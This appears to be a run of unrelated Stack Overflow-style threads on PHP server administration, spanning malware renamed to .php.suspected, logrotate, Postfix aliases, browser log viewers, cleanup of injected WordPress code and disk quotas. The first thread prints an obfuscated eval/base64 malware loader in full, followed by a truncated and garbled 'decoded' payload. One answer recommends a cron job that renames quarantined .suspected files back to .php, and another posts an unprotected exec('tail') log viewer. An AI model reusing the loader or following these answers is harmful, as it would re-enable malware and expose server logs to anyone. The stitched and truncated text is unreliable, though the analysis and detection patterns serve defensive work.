For the last 4 days we have been facing a strange issue on our production server (an AWS EC2 instance), specific to only one site, which runs SugarCRM.
The issue is that the file /home/site_folder/public_html/include/MassUpdate.php is automatically renamed to /home/site_folder/public_html/include/MassUpdate.php.suspected
This happens 2-3 times a day, with a gap of 3-4 hours. It occurs only for this specific site; it doesn't even happen on the staging replica of the same site. I compared the code of that file on both sites, and it's the same.
We Googled and found that this issue mostly affects WordPress sites and could be the result of an attack. But we checked our server for signs of an attack and there aren't any. There is also no virus/malware scanner running on the server.
What should we do?
Update:
We found a few things after going through this link.
We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ and found a few files containing code like the following sample.
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
This seems to be some malware. How do we go about removing it permanently?
Thanks
The renaming of .php files to .php.suspected keeps happening today. On a clean site, the following commands should not turn up anything:
find <web site root> -name '*.suspected' -print
find <web site root> -name '.*.ico' -print
In my case, the infected files could be located with the following commands:
cd <web site root>
egrep -Rl '\$GLOBALS.*\\x'
egrep -Rl -Ezo '/\*(\w+)\*/\s*#include\s*[^;]+;\s*/\*'
egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'
I have prepared a longer description of the problem and how to deal with it at GitHub.
It's somewhat obfuscated, but I've de-obfuscated it. The function flnftovr takes a string and an array as arguments. It creates a new string $ggy using the expression
isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}
It then prepends base64_decode to the string.
The string is $s, the array is $koicev. It then evals the result of this manipulation, so eventually a string gets created:
base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)
So what actually gets run on your server is:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if(isset($_SERVER)
encode(serialize($res));
}
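If you want to inspect the full payload yourself without running it, one approach (a minimal sketch, assuming you copy $s and $koicev verbatim from the infected file) is to reuse the malware's own decoder but print the result instead of eval-ing it:

<?php
// Sketch: decode the obfuscated payload without executing it.
// $s and $koicev must be pasted verbatim from the infected file (placeholders here).
$s      = '...';
$koicev = array(/* ... */);

function decode_payload($encoded, $map) {
    $out = '';
    for ($i = 0; $i < strlen($encoded); $i++) {
        // Same character substitution the malware performs, minus the eval()
        $out .= isset($map[$encoded[$i]]) ? $map[$encoded[$i]] : $encoded[$i];
    }
    return base64_decode($out);
}

// Print the decoded PHP source for inspection instead of executing it
echo decode_payload($s, $koicev);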
If you didn't create this and you suspect your site has been hacked, I'd suggest you wipe the server, and create a new installation of whatever apps are running on your server.
Renaming PHP files to .php.suspected is usually deliberate and done by the hacker's script. The extension is changed to give the impression that the file was checked by some antimalware software, is secure, and can't be executed, when in fact it isn't secure. The script changes the extension back to "php" whenever it wants to invoke the file, and afterwards changes it back to "suspected".
You can read about it at Sucuri Research Labs.
This post may be old, but the topic is still alive, especially in light of the June 2019 malware campaign targeting WordPress plugins. I found a few "suspected" files in my client's WordPress subdirectories (e.g. wp-content).
Posting this answer as it may help others.
Create a file with a '.sh' extension at a convenient location.
Add the following code to it.
#!/bin/bash
# Rename your_file_name.php.suspected back to your_file_name.php
mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php
Save this file.
Set up a cron job for every 10 minutes (or whatever interval you need) using the following line in crontab:
*/10 * * * * path_to_cron_file.sh
Restart the cron service.
You will find plenty of documentation on creating cron jobs on Google.
I'm running PHP 5 FPM with APC as an opcode and application cache. As usual, I am logging PHP errors to a file.
Since that file is becoming quite large, I tried to configure logrotate. It works, but after rotation PHP continues to log to the existing log file even after it has been renamed. This results in scripts.log being a 0 B file and scripts.log.1 continuing to grow.
I think (haven't tried) that running php5-fpm reload in postrotate could resolve this, but that would clear my APC cache each time.
Does anybody know how to get this working properly?
I found that the "copytruncate" option of logrotate ensures that the inode doesn't change. Basically what I was looking for.
This is probably what you're looking for. Taken from: How does logrotate work? - Linuxquestions.org.
As written in my comment, you need to prevent PHP from writing to the same (renamed) file. Copying a file normally creates a new one, and the truncating is part of the option's name as well, so I would assume the copytruncate option is an easy solution (from the manpage):
copytruncate
Truncate the original log file in place after creating a copy, instead of moving the old log file and optionally creating a new one. It can be used when some program cannot be told to close its logfile and thus might continue writing (appending) to the previous log file forever. Note that there is a very small time slice between copying the file and truncating it, so some logging data might be lost. When this option is used, the create option will have no effect, as the old log file stays in place.
See Also:
Why we should use create and copytruncate together?
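Applied to the setup from the question, a minimal logrotate sketch using copytruncate could look like this (the log path and rotation schedule are assumptions, adjust them to your setup):

/var/log/php/scripts.log {
    weekly
    rotate 12
    missingok
    notifempty
    compress
    delaycompress
    copytruncate
}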
Another solution I found on a server of mine is to tell PHP to reopen the logs. I think nginx has this feature too, which makes me think it must be quite commonplace. Here is my configuration:
/var/log/php5-fpm.log {
rotate 12
weekly
missingok
notifempty
compress
delaycompress
postrotate
invoke-rc.d php5-fpm reopen-logs > /dev/null
endscript
}
I've tried to include as much info in this post as possible.
I'm using Postfix on an Amazon EC2 Ubuntu server, and it seems that a PHP script I have aliased to an address isn't firing. Mail delivery works fine, but the script just isn't being run. I've probably missed something easy and would appreciate any ideas.
The code below is the script itself. At the moment it is just a basic script that writes the contents of php://stdin to a file. I'm not sure this is the best way to write it, but it seems OK for now as it's just a temporary script for troubleshooting this problem.
#!/usr/bin/php -q
<?php
$data = '';
$fileName = "parsedData.txt";
$stdin = fopen('php://stdin', 'r');
$fh = fopen($fileName, 'w');
while(!feof($stdin))
{
$data .= fgets($stdin, 8192);
}
fwrite($fh, $data);
fclose($stdin);
fclose($fh);
?>
I have verified this works by passing it a .txt file containing some text.
./test2.php < data.txt
Now that my PHP script seems to work fine locally, I need to make sure it is being called correctly. sudo chmod 777 has been run on the test2.php script. Here is the relevant /etc/aliases file entry.
test: "|/usr/bin/php -q /var/test/php/test2.php"
I run newaliases every time I change this. This seems to be the most correct syntax, as it specifies the location of php fully. test#mydomain receives emails fine from both internal and external senders when it is not set to be aliased. According to syslog, this is successfully delivered to the command rather than to the maildir.
postfix/local[2117]: 022AB407CC: to=<test#mydomain.com>, relay=local, delay=0.5, delays=0.43/0.02/0/0.05, dsn=2.0.0, status=sent (delivered to command: /usr/bin/php -q /var/test/php/test2.php)
The alias has also been written in the following ways without success (either because they go to maildir instead of the command due to wrong syntax or the script just isn't firing).
test: |"php -q /var/test/php/test2.php"
test: "|php -q /var/test/php/test2.php"
test: |"/usr/bin/php -q /var/test/php/test2.php"
test: "| php -q /var/test/php/test2.php"
test: "|/var/test/php/test2.php"
test: |"/var/test/php/test2.php"
The relevant part of my postfix main.cf file looks like this:
myhostname = domainnamehere.com
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
myorigin = /etc/mailname
mydestination = domainnamehere.com, internalawsiphere, localhostinternalaws, localhost
relayhost =
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mailbox_command =
home_mailbox = Maildir/
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
inet_protocols = all
I had error_log("script has started!"); at the beginning of test2.php so that it would appear in the PHP log file if the script was successfully being called. I made sure to go into php.ini to turn on error logging and specify a location for the log to be saved to, but I couldn't get this to work. Getting it working would help, because I could then tell whether the script was failing when it got to the php://stdin handling, as there may be some problem with it handling emails rather than cat'ed .txt files.
My end goal is to get a service that will save emails sent to a certain address, with their attachments, to a MySQL database and then return a unique code for each file/email to the user. Is there an easier way to do something like this than using PHP scripts? Does something like SquirrelMail or DBMail do this?
I've completely exhausted my ideas with this one. Maybe I should just try another email service?
Oh wise people of StackOverflow, help me!
First things first, chmod 777 <foo> is almost always a gigantic mistake. I recognize that you're in a state of desperation -- as indicated by the fact that you ran this command. You want to configure your systems with the least amount of required privilege for each portion of the system to properly do its job. This helps prevent security breaches and reduces needless coupling. But executable files should not be writable by anyone except the executable owner -- and even then, I strongly recommend against it.
Now, onto your problem:
#!/usr/bin/php -q
<?php
$data = '';
$fileName = "parsedData.txt";
You're referring to a file using a relative pathname. This is fine, if you're always confident of the directory in which it starts, or if you want the user to be in control of the directory in which it starts, but it is usually a bad idea for automated tools. The /etc/aliases mechanism may run the aliased commands in the postfix home directory, it might pick an empty directory in /var created just for the purpose, and future releases are more or less free to change this behavior as they wish. Change this path name to an absolute pathname showing exactly where you would like this file to be created -- or insert an explicit chdir() call at the start of your script to change directories to exactly where you want your data to go.
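For example (a minimal sketch; /var/test/php is just the directory already used in the question, substitute whatever location you actually want the data in):

<?php
// Option 1: use an absolute path, independent of the working directory
$fileName = "/var/test/php/parsedData.txt";

// Option 2: pin the working directory explicitly, then a relative name is safe
// chdir('/var/test/php');
// $fileName = "parsedData.txt";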
Next:
$fh = fopen($fileName, 'w');
while(!feof($stdin))
{
$data .= fgets($stdin, 8192);
}
fwrite($fh, $data);
You did not ensure that the file was actually opened. Check those return values. They will report failure for you very quickly, helping you find bugs in your code or local misconfigurations. I do not know PHP well enough to tell you the equivalent of the perror(3) function that will tell you exactly what failed, but it surely can't be too difficult to get a human-readable error code out of the interpreter. Do not neglect the error codes -- knowing the difference between "Permission denied" and "No such file or directory" can save hours once your code is deployed.
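In PHP, a rough equivalent of perror(3) is to check the return value of fopen() and look at error_get_last(); a minimal sketch (using the path assumed above):

<?php
// Abort early, and log why, if the output file can't be opened
$fh = fopen('/var/test/php/parsedData.txt', 'w');
if ($fh === false) {
    $err = error_get_last(); // e.g. "fopen(...): failed to open stream: Permission denied"
    error_log('test2.php: could not open output file: ' . ($err ? $err['message'] : 'unknown error'));
    exit(1);
}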
And, as Michael points out, a mandatory access control tool can prevent an application from writing in specific locations. The "default" MAC tool on Ubuntu is AppArmor, but SELinux, TOMOYO, or SMACK are all excellent choices. Run dmesg and look in /var/log/audit/audit.log to see if there are any policy violations. If there are, the steps to take to fix the problem vary based on which MAC system you're using. Since you're on Ubuntu, AppArmor is most likely; run aa-status to get a quick overview of the services that are confined on your system, and aa-logprof should prompt you to modify policy as necessary. (Don't blindly say "Allow", either -- perhaps active exploit attempts have been denied.)
(If you aren't using a MAC system already, please consider doing so. I've worked on the AppArmor project for twelve years and wouldn't consider not confining all applications that communicate over the network -- but that's my own security needs. More paranoid people may wish to confine more of their systems, less paranoid people may wish to confine less of their systems.)
Is there a way to view the PHP error logs or Apache error logs in a web browser?
I find it inconvenient to ssh into multiple servers and run a "tail" command to follow the error logs. Is there some tool (preferably open source) that shows me the error logs online (streaming or non-streaming)?
Thanks
A simple PHP script to read the log and print it:
<?php
exec('tail /var/log/apache2/error.log', $error_logs);
foreach($error_logs as $error_log) {
echo "<br />".$error_log;
}
?>
You can embed the $error_log PHP variable in HTML as per your requirement. The best part is that the tail command only loads the latest errors, so it won't put much load on your server.
You can change the tail invocation to give the output you want.
Ex. tail myfile.txt -n 100 // it will give the last 100 lines
See What commercial and open source competitors are there to Splunk? and I would recommend https://github.com/tobi/clarity
Simple and easy tool.
Since everyone is suggesting clarity, I would also like to mention tailon. I wrote tailon as a more modern and secure alternative to clarity. It's still in its early stages of development, but the functionality you need is there. You may also use wtee, if you're only interested in following a single log file.
You could make a script that reads the error logs from apache2.
$apache_errorlog = file_get_contents('/var/log/apache2/error.log');
If that's not working, try to get it with the PHP functions exec or shell_exec and the command 'cat /var/log/apache2/error.log'.
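If file_get_contents() fails (for example because of open_basedir restrictions), a minimal sketch of that fallback might be:

<?php
// Fallback: read the log via the shell instead of file_get_contents()
$apache_errorlog = shell_exec('cat /var/log/apache2/error.log');
// Escape it and convert newlines so it renders sensibly in a browser
echo nl2br(htmlspecialchars((string) $apache_errorlog));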
EDIT: If you have multiple servers (I guess with webservers on them), you can create such a file on each machine; when you make a request to that script (over a hashed connection) you get the logs from that server.
I recommend LogHappens: https://loghappens.com. It allows you to view the error log in the browser.
LogHappens supports various kinds of web server log formats; it comes with parsers for Apache and CakePHP, and you can write your own.
You can find it here: https://github.com/qijianjun/logHappens
It's open source and free. I forked it and did some work to make it work better in a dev environment or a public environment. That is:
Support for a security token; one can't access the site without the token set in config.php
Support for IP whitelists for security and privacy
Support for configuring the interval between AJAX requests
Support for loading static files locally (for a local dev environment)
I've found this solution https://code.google.com/p/php-tail/
It works perfectly. I only needed to change the file size handling, because I was getting an error at first.
if($maxLength > $this->maxSizeToLoad) {
    $maxLength = $this->maxSizeToLoad;
    // return json_encode(array("size" => $fsize, "data" => array("ERROR: PHPTail attempted to load more (".round(($maxLength / 1048576), 2)."MB) then the maximum size (".round(($this->maxSizeToLoad / 1048576), 2) ."MB) of bytes into memory. You should lower the defaultUpdateTime to prevent this from happening. ")));
}
And I've added a default size, but it's not needed:
lastSize = <?php echo filesize($this->log) || 1000; ?>;
I know this question is a bit old, but (along with the lack of good choices) it gave me the idea to create this tiny (open source) web app. https://github.com/ToX82/logHappens. It can be used online, but I'd use an .htpasswd as a basic login system. I hope it helps.
I've got a malware-infected site hosted on Linux hosting. All PHP files now start with these lines:
<?php
$md5 = "ad05c6aaf5c532ec96ad32a608566374";
$wp_salt = array( ... );
$wp_add_filter = create_function( ... );
$wp_add_filter( ... );
?>
How can I clean this up with bash/sed or something?
You should restore your backup.
# Strip the injected lines from every .php file in the current directory
FILES="*.php"
for f in $FILES
do
    grep -Ev '\$md5|\$wp_salt|\$wp_add_filter' "$f" > "$f.clean"
    mv "$f.clean" "$f"
done
Just a warning: wp_add_filter() recursively evaluates encoded PHP code, which in turn calls another script that is encoded and evaluated. This larger script not only injects malicious code throughout your site but also appears to collect credentials and execute other hacks. You should not only clean your site, but also make sure the flaw is fixed and any credentials that might have been exposed are changed. In the end, it appears to be a WordPress security issue, but I've not confirmed this. I've added some comments on this over at http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html, which includes a clean-up script and more information on how to decode the malicious script.
You can do it with PHP (fopen, str_replace and fwrite). There shouldn't be any encoding problems.
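A minimal sketch of that idea (the regex is an assumption based on the snippet in the question; preg_replace is used instead of str_replace because the injected $md5 value differs per file, and you should have a backup before rewriting files in place):

<?php
// Remove the injected block from every .php file under the current directory.
$pattern = '/<\?php\s*\$md5 = "[0-9a-f]{32}";.*?\$wp_add_filter\(.*?\);\s*\?>/s';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator('.'));
foreach ($files as $file) {
    if ($file->isFile() && $file->getExtension() === 'php') {
        $code  = file_get_contents($file->getPathname());
        $clean = preg_replace($pattern, '', $code);
        if ($clean !== null && $clean !== $code) {
            file_put_contents($file->getPathname(), $clean);
        }
    }
}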
I was just hit with this on a very full hosting account, every web file full of this PHP?!
After much digging and reading posts everywhere, I came across this guy's cleaner code (see http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html) and tried it on a couple of the least important sites first.
So far so good. Pretty much ready to dig in and use it account-wide to try and wipe this right off.
The virus/malware seems to be called "!SShell v. 1.0 shadow edition!" and infected my hosting account today. Along with the cleaner at http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html, you actually need to find the folder containing the shell file that gives the hackers full access to your server files, and also find "wp-thumb-creator.php", which is the file that does all the PHP injection. I've posted more about this at my blog: http://www.marinbezhanov.com/web-development/6/malware-alert-september-2011-sshell-v.1.0/
I need to find out quota details for the current user.
I've tried
exec("quota 'username'", $retParam)
and also system() but nothing is returned.
Any ideas?
Thank you.
The user PHP runs under is probably not allowed to get other users' quotas - maybe not even its own, or maybe it's not even allowed to execute external commands. Depending on your server setup, you may be able to change PHP's configuration (remove safe_mode for example) and elevate the rights of the PHP user, but I don't know whether that's a wise thing to do. If you are on shared hosting, you would have to speak to your provider whether anything can be done.
This blog entry outlines a clever way to get around PHP's limitations by collecting all quotas in a text file in an external cron job, and parsing that file with PHP. Works only if you have access to the server, of course, or can set up cron jobs with more liberal permissions than the PHP user.
To give a code example and extend the above answer
You need root access + a directory that is readable by your webserver.
do crontab -e
and add
0 * * * * quota -u -s someusername | grep /dev > /path/to/webserver/quota.txt
The above line will save the quota of user someusername in quota.txt located in the webserver folder every hour.
Then write a PHP file to show it
<?php
// quota.txt is the file written by the hourly cron job above.
// Note: the array indexes below depend on the exact column layout of your quota output.
$quota_txt = file_get_contents("quota.txt");
$quota_arr = explode(" ", $quota_txt);

// Strip the trailing unit letter (e.g. "G") and keep the numeric part
function rm_g($str){
    return intval(substr_replace($str, "", -1));
}

echo "total quota: " . $quota_arr[4] . "<br>";
echo "used: " . $quota_arr[3] . "<br>";
$free = rm_g($quota_arr[4]) - rm_g($quota_arr[3]);
echo "free: " . $free . "G";
Not perfect, and it needs to be adapted if you are in a use case where the human-readable format is not G (gigabytes); in that case remove the -s, parse the raw numbers, and then convert them to a human-readable form in PHP.
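For that last step, a small helper like this can do the conversion (a sketch; the unit names and rounding are my own choices):

<?php
// Convert a raw byte count into a human-readable string, e.g. 1536 -> "1.5 KB"
function human_readable_bytes($bytes) {
    $units = array('B', 'KB', 'MB', 'GB', 'TB');
    $i = 0;
    while ($bytes >= 1024 && $i < count($units) - 1) {
        $bytes /= 1024;
        $i++;
    }
    return round($bytes, 1) . ' ' . $units[$i];
}

echo human_readable_bytes(5368709120); // prints "5 GB"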
Also, as you may have guessed, the cron job is hourly, which means the user is not getting real-time stats and there might be some inconsistencies. You may want to increase the frequency of the cron job.
Another, more intensive approach is to get the quota as above, but run du every time to get the space that is really used (search for "get folder size with PHP efficiently" and you will find code). This will get you the real-time remaining quota.
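A sketch of that du-based variant (the home directory path is an assumption, and du can be slow on large directory trees):

<?php
// Real-time used space: run `du` on the user's directory every request.
// escapeshellarg() guards against unexpected characters in the path.
$dir = '/home/someusername';
$used_kb = intval(shell_exec('du -sk ' . escapeshellarg($dir) . ' | cut -f1'));
echo "currently used: " . round($used_kb / 1048576, 2) . " GB";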